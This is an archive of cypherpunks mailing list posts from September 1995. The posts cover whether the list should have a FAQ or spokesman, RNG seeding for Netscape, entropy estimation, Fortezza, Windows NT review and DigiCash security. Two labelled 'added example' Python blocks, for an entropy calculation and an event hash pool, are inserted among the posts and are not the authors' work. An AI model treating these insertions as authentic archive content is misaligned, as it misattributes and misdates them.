of *deliberately* trying to start a flamewar here really hurts
my feelings! if I were really that mischievous, the meager return would
be quite an insult to my expertise.. <g>).

however this is entirely a matter of phrasing of the question.
I am *not* advocating that someone be elected the spokesman, that
everyone agrees on what he says, that we all agree it is our
"official representation" etc. and I thought I made this clear.
(oops, I used that "we" word again, my humble apologies. just pretend
that I'm talking to my tentacles if you object.)
I do believe these are valuable attributes of groups and can 
help knit cohesion and help determine meaningful agenda 
(people here sometimes complain about the lack of focus or
of conquest, and do you need any clue as to *why* there is a lack
of this?) but I will not promote it where it is not relevant (or
at least, not welcomed).

what I had in mind was a more FAQ-like cypherpunks document, with a
list of who considers themself a cypherpunks contributor, or just
someone who is willing to be a listed expert on a topic for media
inquiries. all the time, someone just sits down and writes a FAQ for 
a newsgroup, yet there was no "official" appointment.

if a FAQ is continually updated, it becomes very much like a press release. 
a question on the list might be, "what exactly did the cypherpunks discover 
about netscape? what is the seriousness of this flaw?" etc.  in this way the 
questions become virtually identical to what the media would inquire. and in
a sense every newsgroup's FAQ is almost like a "press release" for
everyone in the newsgroup. but this also shows why a FAQ is almost invariably
*extremely* time consuming and a herculean task to compile/update involving
huge numbers of man-hours the refined, final product does not convey.

I am advocating that individuals here come up with a FAQ. there are excellent
web sites, but not a simple FAQ of this group. I also encourage competing
FAQs at first. this happens all the time in newsgroups, and they eventually
merge or cover different topics.

the FAQ topic has been discussed here often, and everyone agrees it 
is a pretty good idea, and someone should "just do it" if they want to.
I guess what I'm pointing out (beyond the usual noise on the subject)
is that if anyone wants to have cypherpunk
press releases, that energy is better channelled into a FAQ. it is a
definite vacuum that would beneficially be filled, IMHO. (the TCM 
cyphernomicon, while admirable, is not really a FAQ imho..)

I am *not* advocating that (or rather, I say that we *should not*) 
vote on a FAQ writer, decide what is the *official* FAQ for the group 
if there are competing ones, bar or *discourage* some people from 
creating a FAQ, etc.

what I want to point out is that the FAQ is a model by which a 
very anarchic group of people can come to a definite document by
which they communicate their "findings" and their concerns, and
everything else that occupies their brains daily. this happens
through the FAQ writer as a conduit. in a sense, the FAQ writer
is the unappointed "spokesman" for the group. he wins approval
through the gradual process of people using the document and not
through any other means.

another alternative that actually seems to be enjoying some success
is for individual cypherpunks to issue press releases pertaining to 
their own specialty. i.e., "so-and-so at company X announced that
they would be doing so-and-so in conjunction with the cypherpunks".
again, how can anyone object to this if there really is no such
thing as a "cypherpunk group"? their press release certainly can't
be in conflict with something that doesn't exist.

the sword cuts both ways, although the rabid elements on this list 
would rather not admit it: if no one is a cypherpunk, if there is
no "official" goal or leader, if the term is not owned by anyone,
then anyone can define "cypherpunk" to be anything they want, and 
do anything they like under that title. as soon as you say, "well,
they're not a cypherpunk if so-and-so", well, you're pretty much violating
your own premise: that there is no such thing as a "cypherpunks group"
or "official agenda".

it seems to me that the opposition to group organizing etc. in this
group is related to something else: the idea that the most valuable
conquests come from individual tinkerers who are not part of any
"group", who pursue their own ideas at the ignorance or hostility of
the rest of "society" (another cypherpunk 4-letter word, of course).

this is related to the idea of doing things in secret, too. "the most
valuable projects are those that are kept secret, pursued by only one
or a few, and then unleashed on the world all at once." these are 
interesting and enticing ideas, and I don't deny them to some degree
(there are many famous historical examples, such as arguably Tesla,
Ramanujan, Fermat, Archimedes, etc.), but it is also true, IMHO, that 
there are certain things that cannot be accomplished
without a certain degree of organization and cooperation among many
elements.. (well, again a cryptoanarchist heresy, but hell, I'm pretty
good at those). but fortunately a FAQ does not require the latter, although
it can benefit immensely from it (the sci.crypt FAQ has a group of
collaborating writers, as do many other FAQs).


--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 26 Sep 95 12:56:19 PDT
To: sameer <sameer@c2.org>
Subject: Re: getting netscape to support the remailers
Message-ID: <9509261951.AA01873@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  	I started thinking about what it would take to get Netscape
>  to support sending mail through the remailers, after having
>  read the S/MIME specs which Netscape 2.0 is apparently going to
>  support. Perhaps with enough browbeating Netscape 3.0 will support
>  the remailers.

Netscape doesn't need to support remailers explicitly since Netscape will be  
supporting Java.  I think a remailer client is within Java's capabilities...   
Anyone disagree?

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 26 Sep 95 15:25:03 PDT
To: stewarts@ix.netcom.com
Subject: Re: The Fortezza random number generator is not trustworthy
In-Reply-To: <199509232254.PAA11243@ix8.ix.netcom.com>
Message-ID: <199509262156.OAA21527@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> On a technical note, I would have thought that Fortezza and/or CAPSTONE used
> some sort of hardware RNG, i.e. noisy Zener diodes or whatever.  I've seen it
> mentioned on this list that some other NSA secure phones, such as STU-III,
> do that.

I was under the impression that a seed for the RNG is loaded into the
Fortezza at initialization time.  This would make me think that they
are using a cryptographically strong PRNG.  This would give data that
appears random, but is completely determined by the initial state.

I suspect that the "seed keys" provided by the two agencies used to
program the Clipper chips have the same properties.  This makes the
question about how does the NSA get access to the key escrow database
moot.  They don't need access.  They know a priori all the unit keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 26 Sep 95 12:42:27 PDT
To: jirib@cs.monash.edu.au
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <199509250402.OAA17312@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9509261538.C922-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




While it is true that on some versions of X you can watch mouse events on
other people's computers, it is also true that on some versions you can
watch keyboard input.  At CMU Bennet Yee wrote a program to get people's
passwords as they typed them in using X's poor/non-existent security back
then.  This was before xauth. 

I still think that the low bits of the mouse's X and Y positions as the
user moves the mouse around the screen are a very good source of random
bits for Netscape.

   --  Vince




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Tue, 26 Sep 95 12:41:58 PDT
To: ietf-payments@cc.bellcore.com
Subject: First Payments WG Meeting Announcement
Message-ID: <9509261941.AA17884@www18.w3.org>
MIME-Version: 1.0
Content-Type: text/plain

The World Wide Web Consortium is holding a Workshop on payments. The workshop
is intended to be a small, technically oriented meeting of its payments working
group. Although it is a members only event I am willing to listen to special
pleading; alternatively, companies may wish to join the consortium at our
extremely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
details.

-- 
Phillip M. Hallam-Baker            Not speaking for anyone else
hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!


ANNOUNCE: First W3C Payments WG Meeting, October 11

----------------------------------------------------------------------------

What: 1st W3C Payment WG Meeting

Where: MIT EECS, Grier Room 34-401 (subject to change)

When: Wednesday October 11, 9am - 5pm

Who: W3C Member Representatives ONLY

URL: First W3C Payments WG Meeting

W3C is making progress on supporting electronic payments on the web. This WG
Meeting has been called to foster discussion and feedback between W3C and
its members. Discussion will focus on proposals to the W3C for payment
protocols, interfaces, and e-commerce support.

The agenda for the electronic payment workshop is still being settled. At
the current time we have confirmed presentations by VISA, IBM, W3C, and the
Financial Services Technical Consortium (FSTC). Additional invitations have
been issued, and suggestions for additional presentations would be welcome.
Contact Phillip Hallam-Baker (hallam@w3.org) or Jim Miller (JMiller@w3.org)
with suggestions.

There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th.
Contact Rohit Khare for details (khare@w3.org)

To RSVP for the Payments WG Meeting, email the coordinator, Phillip
Hallam-Baker (hallam@w3.org) or call 617/258-5967 by 5 October. This
workshop is aimed at technologists; please include a brief description of
any relevant payments work you or your organization are involved in.

This is a preliminary announcement of the date and time only. We have
arranged for hotel rooms at the Kendall Square Marriott. To qualify for the
MIT discount, notify Susan Hardy (susan@w3.org).

For a review of the Consortium's plans, see W3C's report on Electronic
Payment Schemes and the Third W3C Security Workshop.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 26 Sep 95 14:56:32 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: `Random' seed.
Message-ID: <30687693@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze <mab@crypto.com> wrote:

>Here's my current favorite quick-and-dirty true-random-in-software generator.
>Use at own risk and read the comments carefully...
[...]
> *      Physically random numbers (very nearly uniform)
> *      D. P. Mitchell
> *      Modified by Matt Blaze 2/95
[...]
> * WARNING: depending on the particular platform, truerand() output may
> * be biased or correlated.  In general, you can expect about 16 bits of
> * "pseudo-entropy" out of each 32 bit word returned by truerand(),
> * but it may not be uniformly diffused.

While this comment provides some general information, it does not give the 
expected entropy in the form of testable assumptions.  A first step in this 
direction is to provide the entropy series used to arrive at the 16 bit per 
32 bit word estimate.  The second step, as I recommended last week (RE: RNG 
Resource FAQ... on 9/22), is to provide a concise argument drawn directly 
from the mathematical weaknesses of the entropy series.  In that post, I 
posed the following four criteria because they address the mathematical 
(theoretical) weaknesses of the entropy series, while using a vocabulary 
that should be sensible to a rigorous designer:

1)  The states exist and can be identified.
2)  The number of states n is known.
3)  The index value i uniquely identifies a state.
4)  The function P_i is known and well-behaved.

In this way, an analyst can review both the entropy series itself, and a 
_concise_ statement of the criteria under which the series is defined (i.e. 
when the 4 mathematical weaknesses have been appropriately addressed), and 
the argument "why" has been scrutinized against the code or proposed design.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 26 Sep 95 14:56:30 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: More on "Entropy"
Message-ID: <30687699@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



David Van Wie wrote:

>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Timothy C. May wrote:

>Hah! Another physicist converted to the information-theoretic view of entropy!

Indeed.  I was able to track down the literature, and it is most 
interesting.  I am still a little bit skeptical of the "superset including 
thermodynamic entropy" school of thought, but I haven't finished reading all 
of the materials yet!  Clearly, the IT "version" of entropy is a well 
defined and useful thing....

>I should've pointed out in my reading list that several names stand out in
>this interpretation:

I'll read with that endorsement in mind.  Your thoughts on rigorous, 
_concise_, design criteria for sources of entropy would be appreciated 
(unless there is good quality work in the literature I haven't come to yet).

dvw
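
Added example, not part of either post above and not code by any list member: a run through the entropy series E = sum of -P_i log_2(P_i) for a constructed model of a 32-bit word in which only the low 16 bits vary. It shows how a biased P_i (criterion 4) and correlated words counted as separate states (criterion 3) change the estimate. The model, the 0xABCD0000 constant and all function names are assumptions made for illustration.

```python
import math
from fractions import Fraction

VARYING_BITS = 16            # assumption: only the low 16 bits of a word vary
FIXED_HIGH = 0xABCD0000      # constructed constant for the high 16 bits


def entropy_series(p):
    """E = sum over the n states of -P_i * log2(P_i), in bits.

    p maps a state index i to P_i, given as exact Fractions.  The four
    criteria are enforced as far as code can enforce them: the states are
    enumerated (1), n = len(p) is known (2), dict keys make every index
    unique (3), and the P_i are non-negative and sum to exactly 1 (4).
    """
    if not p:
        raise ValueError("no states identified")
    if any(pi < 0 for pi in p.values()):
        raise ValueError("negative P_i")
    if sum(p.values()) != 1:
        raise ValueError("P_i do not sum to 1")
    total = 0.0
    for pi in p.values():
        if pi > 0:                      # a zero-probability state adds nothing
            f = float(pi)
            total -= f * math.log2(f)
    return total


def word_model(p_top_bit_set=Fraction(1, 2)):
    """Distribution of one 32-bit word: high half fixed, low half varying.

    The top varying bit is set with probability p_top_bit_set; the other
    15 varying bits are fair.  A value other than 1/2 models a biased source.
    """
    per_half = 1 << (VARYING_BITS - 1)
    p = {}
    for low in range(1 << VARYING_BITS):
        top_bit = low >> (VARYING_BITS - 1)
        prob = p_top_bit_set if top_bit else 1 - p_top_bit_set
        p[FIXED_HIGH | low] = prob / per_half
    return p


def pair_model(single):
    """Two successive words where the second is a fixed function of the first.

    The joint state is the pair; indexing each word separately would count
    the same underlying state twice.
    """
    return {(w, (w + 1) & 0xFFFFFFFF): pi for w, pi in single.items()}


if __name__ == "__main__":
    fair = word_model()
    biased = word_model(Fraction(3, 4))
    pairs = pair_model(fair)
    print("states per word n      :", len(fair))
    print("fair word            E :", entropy_series(fair))
    print("biased top bit       E :", round(entropy_series(biased), 6))
    print("naive 2-word sum       :", 2 * entropy_series(fair))
    print("correlated pair      E :", entropy_series(pairs))
```
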




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 26 Sep 95 14:57:20 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Netscape "random" number seed generator code available
Message-ID: <3068769F@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton wrote:

>[You will be expected to show your work. :-)]

In the spirit of showing work, how about a run through your entropy series?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Sep 95 13:03:05 PDT
To: cypherpunks@toad.com
Subject: IBE_dam
Message-ID: <199509262002.QAA17680@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-26-95. W$Japer:

   "On-Line Service to Assist Global Trade."

      A group of multinational companies is expected to unveil
      today an on-line service to businesses to engage in
      international trade. Dubbed IBEX, it is a joint effort
      of AT&T, Dun & Bradstreet, General Electric and the U.S.
      Chamber of Commerce to let businesses use on-line
      traffic to line up suppliers, negotiate contracts, make
      and receive bids, and arrange the delivery of goods and
      services around the world. IBEX expects the backing of
      Chase Manhattan, Microsoft, DEC and Simon & Schuster.

      The IBEX software allows companies to sign on and submit
      a request for goods or services, which is posted
      anonymously. The request could be styled using an array
      of categories offered by the service, including
      location, product category, payment and shipping terms.
      The customer would then receive bids from businesses
      hoping to land the contract. Once a bid is chosen, the
      identities of the businesses are disclosed and
      negotiations begin. IBEX allows them to attach documents
      such as confidentiality agreements, contracts and
      purchase orders.


   IBE_dam  (5 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 26 Sep 95 13:46:55 PDT
To: cypherpunks@toad.com
Subject: Re: Hack Microsoft?
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <9509262046.AA18525@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>   Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>they approve C2.

Well yes and no, C2 is not a particularly high security rating. It is also a 
fairly obsolete set of requirements. So if anyone is to claim a breach of a C2 
system it had better be one within the C2 assurances, not something that is only 
covered in the B series criteria. What really matters is the combined criteria 
which should have/would have emerged from NIST had the issue of harmonising the 
US/Canadian criteria with the European ones turned up.

As a cypherpunks aside we reviewed the orange book criteria in a reading group 
here at MIT a few months back. One point that was made was that Orange Book does 
not consider cryptographic security systems which was generally considered a 
disappointment.

Obviously Windows NT is "fair game" for analysis. Remember however that it is an 
established operating system and that there are many people who rely on it. I 
think that if people want to go down that route they should start by 
establishing contacts with CERT and Microsoft in order to make sure that 
people whose businesses depend on the security of their O/S are not compromised. 
You may well find that Microsoft is willing to give you free copies of WNT to do 
this type of work on.

I think that this would be a really good project. The more independent analysis 
of an operating system that takes place the more confidence people can place in 
it. Windows NT is in many ways a descendent of VMS which has a very good 
security record. There is no reason why Windows NT should not mature to that 
level of security. It was built with security in mind after all, unlike the UNIX 
situation, where security was never more than an afterthought and often merely wishful 
thinking.

There are an awful lot of WNT seats out there already. I expect them to 
outnumber UNIX very soon. The only thing that is holding it back is the 
relatively small size of the userbase compared to windows and the resources 
required to run it. WNT requires similar CPU and memory to UNIX which is hardly 
surprising since it is doing very much the same thing.

I would suggest however that the project is structured and coordinated in some 
fashion. Someone should keep a list of security concerns that have been 
addressed and checked. That list should have some structure such as a division 
into the main risk categories (Authenticity, confidentiality, Service) so that 
people can get a feel for how thoroughly the space is being searched. Later on 
that list is likely to be one of the most valuable end results of such a 
project.


		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Tue, 26 Sep 95 17:26:57 PDT
To: vince@offshore.com.ai>
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <199509270005.UAA16643@frankenstein.piermont.com>
Message-ID: <9509261708.ZM150@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 26,  8:05pm, Perry E. Metzger wrote:
> > I still think that the low bits of the mouse's X and Y positions as the
> > user moves the mouse around the screen are a very good source of random
> > bits for Netscape.
> 
> Agreed.

  In case it is not clear from our previous postings, our patched
version will continually feed position and time of user events
through the RNG hash, in addition to any seeding that we do on
startup.  In the case of X, we use both the X event time from
the server, and the current time (based on the highest resolution
clock available in the client).

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
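
Added example, not Netscape's code: a small hash pool that takes a startup seed and then folds the position and both timestamps of every user event into its state, as the message above describes. SHA-256, the record layout and the names EventPool, add_event, random_bytes and run are assumptions; the events are constructed sample values.

```python
import hashlib
import struct


class EventPool:
    """Hash-based pool: startup seed first, then every user event."""

    def __init__(self, startup_seed):
        self._state = hashlib.sha256(b"seed:" + startup_seed).digest()
        self._outputs = 0

    def add_event(self, x, y, server_time_ms, client_time_ns):
        # Fixed-width encoding, so two different events can never
        # serialize to the same byte string.
        record = struct.pack(">iiQQ", x, y, server_time_ms, client_time_ns)
        # The old state is hashed together with the record: events
        # accumulate, and a later event cannot cancel an earlier one.
        self._state = hashlib.sha256(
            b"event:" + self._state + record).digest()

    def random_bytes(self, n):
        out = b""
        while len(out) < n:
            self._outputs += 1
            out += hashlib.sha256(
                b"out:" + self._state
                + struct.pack(">Q", self._outputs)).digest()
        # Step the state forward so this output cannot be regenerated
        # from a later copy of the pool state.
        self._state = hashlib.sha256(b"next:" + self._state).digest()
        return out[:n]


# Constructed sample events: (x, y, X server time in ms, client clock in ns).
EVENTS = [
    (412, 305, 88123401, 812345678901234),
    (415, 309, 88123417, 812345694377120),
    (421, 311, 88123433, 812345710981455),
]


def run(seed, events, n=16):
    """Seed a pool, feed it the events in order, and draw n bytes."""
    pool = EventPool(seed)
    for event in events:
        pool.add_event(*event)
    return pool.random_bytes(n)


if __name__ == "__main__":
    seed = b"constructed startup seed"
    print(run(seed, EVENTS).hex())
    # One client-clock tick of difference in the last event changes the output.
    nudged = EVENTS[:-1] + [(421, 311, 88123433, 812345710981456)]
    print(run(seed, nudged).hex())
```

The pool is a deterministic function of its inputs, so its output is only as unpredictable as the seed and the events fed to it.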




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 26 Sep 95 17:32:07 PDT
To: ecm@ai.mit.edu
Subject: weak links in DigiCash system
Message-ID: <199509262333.RAA01743@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Jerod, I'm forwarding your message to a couple of lists.  I thought you
made good points.  Of course DigiCash is only running a demo, but still--
why demo poor security?  I think it doesn't make a good impression.


Bryce, signatures at end


- ------- Forwarded Message

To: ecash-feedback@digicash.com
cc: netherto@taussky.cs.colorado.edu, wilcoxb@taussky.cs.colorado.edu
Subject: Security in your ecash project.
Date: Tue, 26 Sep 1995 17:00:15 -0600
From: Jerod D Netherton <netherto@taussky.cs.colorado.edu>

I have a couple of problems/complaints with your ecash project.
When I was sent my Acct ID and Passwd they were sent to me plain text
instead of being PGP-encrypted first.  This means that some malicious
hacker could have intercepted the e-mail message and stolen the
free cyber-bucks you were so generous as to give me.  Second, on the
WWW-page where one downloads the software it does not seem to do a secure
connection between my browser and your server (on netscape there is
a small key in the lower-left hand corner that is supposed to show when
one is securely connected to a secure server).  So someone could sniff my
password from the transaction when I GET the software.  Also, when I'm
buying/selling things it would be smart for all parties involved to
be using PGP, and I think you should stress this point more in your page.
Otherwise this is another vulnerable point in your system IMHO.
Thank you for your time.

  /\ The Scottish Claymore of All CyberSpace      UgradLab DumpMeister
 /\  Watcher of Anime.  Addictor to Muds.      WebMaster of OAA at CU!
<    E  A  N  O  R       JaDuN Comes.            Shade and Sweet Water
 \/               Yuri, Miyu, Nene, Ranma-chan, Ryoko, B-ko!
  \/ Anime, Chivalry, and Physics Forever!!!!	    Finger for PGP Key
Email:netherto@colorado.edu  Phone:(303)786-8311   Pager:(303)610-1203
http://ugrad-www.cs.colorado.edu/~netherto/Home.html Lab:(303)492-6207

- ------- End of Forwarded Message

signatures follow


To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMGiNz/WZSllhfG25AQHFMAQApc6Td8e6bQsBqpCU+EnfbYhueJthyYPS
rkHfFrenHNwG/MCEFtwXBBxEQP3yyvnY2qD9RrrhC3cN0HcFw2jE8r++2Y3Z9H7u
dJuIKodi2LP8POoW6dJPlW93N5E/+LhuCZvfqe78T2bIl20GIYQ5x0UUTm+APo2f
MLu6wUEAHTE=
=ofwj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton <karlton@netscape.com>
Date: Tue, 26 Sep 95 17:54:15 PDT
To: sameer <sameer@c2.org>
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <3068A092.31E4@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
 
>         I haven't seen any mention of this feature in 2.0, so if the
> feature exists in 2.0, then great! Otherwise, unless Netscape is going
> to allow for alternate cert agencies on a specific timescale, I think
> we have to do something about it in order to force the issue.

Netscape has already announced that for 2.0, the user will be able to accept (trust)
(or reject) any set of certificate authorities for signing of certificates.

I briefly looked for a copy of that announcement, but I could not find it.

PK
--
Philip L. Karlton                       karlton@netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: imschira@nyx10.cs.du.edu (Ian M. Schirado)
Date: Tue, 26 Sep 95 17:44:32 PDT
To: cypherpunks@toad.com
Subject: (fwd) FBI COMPUTER FRAUD WEB SITE DIVISION
Message-ID: <9509270000.AA22231@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


Path: mnemosyne.cs.du.edu!uunet!in2.uu.net!noc.near.net!das-news2.harvard.edu!oitnews.harvard.edu!newsfeed.rice.edu!news.sesqui.net!news.concom.com!news
From: Rick Casimir <rikkkk@concom.com>
Newsgroups: misc.forsale.computers.pc-specific.misc
Subject: FBI COMPUTER FRAUD WEB SITE DIVISION
Date: 21 Sep 1995 17:47:42 GMT
Organization: Connections.Com
Lines: 9
Message-ID: <43s8fu$r4t@carbon.concom.com>
NNTP-Posting-Host: dial139.concom.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 1.1PE (Windows; I; 16bit)

HELLO,

If you or someone you know who has been scammed or didn't ship you 
products after you prepaid or for whatever reason who screwed you.

REPORT THEM TO THE FBI:

<http://www.fbi.gov/compcrim.htm>


--

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 26 Sep 95 15:31:07 PDT
To: cypherpunks@toad.com
Subject: Internet draft on MIME/PGP
Message-ID: <Pine.3.89.9509261845.C17046-c100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don't want to start another MIME war, but thought some on the list might 
be interested in this.


---------- Forwarded message ----------
Date: Tue, 26 Sep 95 15:10:57 -0400
From:Internet-Drafts@CNRI.Reston.VA.US
To: IETF-Announce:  ;
Subject: I-D ACTION:draft-elkins-pem-pgp-00.txt

A New Internet-Draft is available from the on-line Internet-Drafts 
directories.                                                               

       Title     : MIME Security with Pretty Good Privacy (PGP)            
       Author(s) : M. Elkins
       Filename  : draft-elkins-pem-pgp-00.txt
       Pages     : 3
       Date      : 09/25/1995

This document describes how Pretty Good Privacy (PGP) can be used to 
provide privacy and authentication using the Multipurpose Internet Mail 
Extensions (MIME) security content types described in RFCXXXX 
(draft-ietf-pem-sigenc-03.txt).                                            

Internet-Drafts are available by anonymous FTP.  Login with the username
"anonymous" and a password of your e-mail address.  After logging in,
type "cd internet-drafts" and then
     "get draft-elkins-pem-pgp-00.txt".
A URL for the Internet-Draft is:
ftp://ds.internic.net/internet-drafts/draft-elkins-pem-pgp-00.txt
 
Internet-Drafts directories are located at:	
	                                                
     o  Africa                                   
        Address:  ftp.is.co.za (196.4.160.8)	
	                                                
     o  Europe                                   
        Address:  nic.nordu.net (192.36.148.17)	
        Address:  ftp.nis.garr.it (192.12.192.10)
	                                                
     o  Pacific Rim                              
        Address:  munnari.oz.au (128.250.1.21)	
	                                                
     o  US East Coast                            
        Address:  ds.internic.net (198.49.45.10)	
	                                                
     o  US West Coast                            
        Address:  ftp.isi.edu (128.9.0.32)  	
	                                                
Internet-Drafts are also available by mail.	
	                                                
Send a message to:  mailserv@ds.internic.net. In the body type: 
     "FILE /internet-drafts/draft-elkins-pem-pgp-00.txt".
							
NOTE: The mail server at ds.internic.net can return the document in
      MIME-encoded form by using the "mpack" utility.  To use this
      feature, insert the command "ENCODING mime" before the "FILE"
      command.  To decode the response(s), you will need "munpack" or
      a MIME-compliant mail reader.  Different MIME-compliant mail readers
      exhibit different behavior, especially when dealing with
      "multipart" MIME messages (i.e., documents which have been split
      up into multiple messages), so check your local documentation on
      how to manipulate these messages.
							
For questions, please mail to Internet-Drafts@cnri.reston.va.us.
							

Below is the data which will enable a MIME compliant mail reader 
implementation to automatically retrieve the ASCII version
of the Internet-Draft.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 26 Sep 95 17:35:26 PDT
To: Dan Bailey <dan@milliways.org>
Subject: Re: Hack Microsoft?
In-Reply-To: <199509261433.AA11352@ibm.net>
Message-ID: <9509262257.AA28908@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 26 Sep 95 10:33:07 EDT
    From: Dan Bailey <dan@milliways.org>

    For fun ways to hack NT, check out http://www.somar.com/security.html.

Thanks for the pointer.  The URL is actually
http://www.somar.com/security.htm (no `l'), but it's easy to find as a
link near the top of http://www.somar.com/

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 26 Sep 95 19:00:33 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
Message-ID: <9509270202.AA17457@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger"

There is this widespread and wholly misplaced affection for
"cypherpunks". We aren't a company or an organization. This is a
mailing list, and occasionally a seminar series in places like
NoCal. It isn't a "group".
..............................................

And you of all the cpunks, Perry, are the most affectionately considered. :>)

Actually, those who want to become official spokewheels should consider that 
the cypherpunk agenda is to promote anarchic (i.e. individualistic, 
self-responsible) action.  That is, that the individual who chooses to act in a 
'cypherpunkish' mode does so at their own risk by their own motivation by their 
own decision and their own discretion.  Not everyone on the list subscribes to 
this ideal of complete independence; furthermore, for anarchist types to 
identify with a "group" would be inconsistent with the philosophical attitude 
of the "members", who come-&-go as they please.

However, it would be an amazing event to see VZ Nuri-logical (Cypherpunk 
Extraordinaire) on TV, saying something like, "Yes, I fully and completely 
subscribe to the Cypherpunk agenda:  black markets, anarchy, overthrow of 
governments.  National borders are just speed bumps on the information 
superhighway."

<g> 
(It would be a *cold* day in Hell!)

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 17:30:39 PDT
To: mkj@october.ducktown.org
Subject: Re: cypherpunks press releases/contact list
In-Reply-To: <199509261623.AA00939@october.ducktown.org>
Message-ID: <199509262341.TAA16602@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



mkj@october.ducktown.org writes:
> For better or worse, in the media we ARE a group,

I don't care. Anyone claiming to represent "cypherpunks" will be lying
-- at the very least, they will not be representing Tim May, and they
will not be representing me.

Given that there is no organization, you can't get the organization to
agree on anything anyway. If you claim to represent the group, you'll
just be lying.

No one is going to be representing "Perry Metzger", either. I don't
want anyone on earth pretending to represent me, as I'm the only
person who can state my views authoritatively.

Who gives a damn, anyway? It's not as though we have a "cypherpunks"
reputation to uphold.

If you want to get associated with something, go out and crack a
cryptosystem on your own. Quit thinking "group".


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
